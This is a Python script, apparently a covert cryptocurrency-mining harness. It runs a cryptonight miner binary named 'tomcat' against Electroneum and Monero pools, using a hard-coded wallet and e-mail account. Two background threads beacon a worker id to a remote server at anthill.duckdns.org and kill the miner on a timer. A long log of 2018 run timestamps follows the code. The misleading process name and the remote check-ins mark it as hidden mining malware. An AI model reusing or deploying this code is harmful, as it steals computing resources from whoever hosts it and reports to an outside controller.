import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:04.888618
#2018-02-17 16:16:05.163959
#2018-02-17 18:03:05.946883
#2018-02-17 19:52:05.503684
#2018-02-17 21:41:06.172019
#2018-02-17 23:25:06.522309
#2018-02-18 01:14:05.000464
#2018-02-18 03:02:07.086302
#2018-02-18 04:49:07.672485
#2018-02-18 06:41:02.116308
#2018-02-18 08:30:01.960476
#2018-02-18 10:17:06.618938
#2018-02-18 12:03:06.414482
#2018-02-18 13:48:01.281132
#2018-02-18 15:38:06.543743
#2018-02-18 17:27:06.780823
#2018-02-18 19:15:01.434793
#2018-02-18 21:02:04.876557
#2018-02-18 22:48:06.414756
#2018-02-19 00:37:01.567902
#2018-02-19 02:23:06.177377
#2018-02-19 04:09:06.958654
#2018-02-19 05:53:05.009709
#2018-02-19 07:41:06.116055
#2018-02-19 09:32:06.774315
#2018-02-19 11:22:08.881477
#2018-02-19 13:09:01.709044
#2018-02-19 14:56:10.509619
#2018-02-19 16:44:07.024752
#2018-02-19 18:32:05.324677
#2018-02-19 20:18:05.383060
#2018-02-19 22:07:04.510661
#2018-02-19 23:52:07.961895
#2018-02-20 01:38:05.636939
#2018-02-20 03:26:06.513566
#2018-02-20 05:14:06.575882
#2018-02-20 06:57:01.655684
#2018-02-20 08:43:05.429711
#2018-02-20 10:27:01.680499
#2018-02-20 12:12:01.444638
#2018-02-20 14:01:06.020539
#2018-02-20 15:43:09.346641
#2018-02-20 17:31:07.747415
#2018-02-20 19:20:08.951015
#2018-02-20 21:09:07.319892
#2018-02-20 22:54:06.778259
#2018-02-21 00:37:02.202574
#2018-02-21 02:24:07.392211
#2018-02-21 04:10:08.005484
#2018-02-21 05:57:04.152958
#2018-02-21 07:45:04.197236
#2018-02-21 09:34:01.212231
#2018-02-21 11:22:06.858232
#2018-02-21 13:12:07.238338
#2018-02-21 14:57:10.345948
#2018-02-21 16:47:01.927990
#2018-02-21 18:39:09.410303
#2018-02-21 20:24:08.872556
#2018-02-21 22:13:03.908492
#2018-02-22 00:03:04.129045
#2018-02-22 01:51:05.113411
#2018-02-22 03:38:06.677752
#2018-02-22 05:25:06.851106
#2018-02-22 07:10:06.272538
#2018-02-22 08:56:06.689668
#2018-02-22 10:44:05.936941
#2018-02-22 12:31:07.532434
#2018-02-22 14:16:01.577827
#2018-02-22 16:05:07.891723
#2018-02-22 17:51:07.739803
#2018-02-22 19:38:01.476196
#2018-02-22 21:29:07.632321
#2018-02-22 23:16:06.240345
#2018-02-23 02:29:04.268693
#2018-02-23 04:18:01.528242
#2018-02-23 06:04:04.115787
#2018-02-23 07:51:01.476080
#2018-02-23 09:53:07.063954
#2018-02-23 11:57:01.903061
#2018-02-23 13:46:07.005440
#2018-02-23 15:34:04.577777
#2018-02-23 17:22:08.312221
#2018-02-23 19:09:01.913210
#2018-02-23 20:53:05.420374
#2018-02-23 22:38:01.462668
#2018-02-24 00:24:06.232054
#2018-02-24 02:16:05.895307
#2018-02-24 04:05:05.557087
#2018-02-24 05:49:04.646896
#2018-02-24 07:40:07.009478
#2018-02-24 09:25:01.510881
#2018-02-24 11:18:04.692310
#2018-02-24 13:07:07.690320
#2018-02-24 14:56:06.577758
#2018-02-24 16:46:07.012882
#2018-02-24 18:34:06.429600
#2018-02-24 20:21:05.004905
#2018-02-24 22:17:04.057306
#2018-02-25 01:25:08.556329
#2018-02-25 05:18:04.867638
#2018-02-25 11:24:01.282138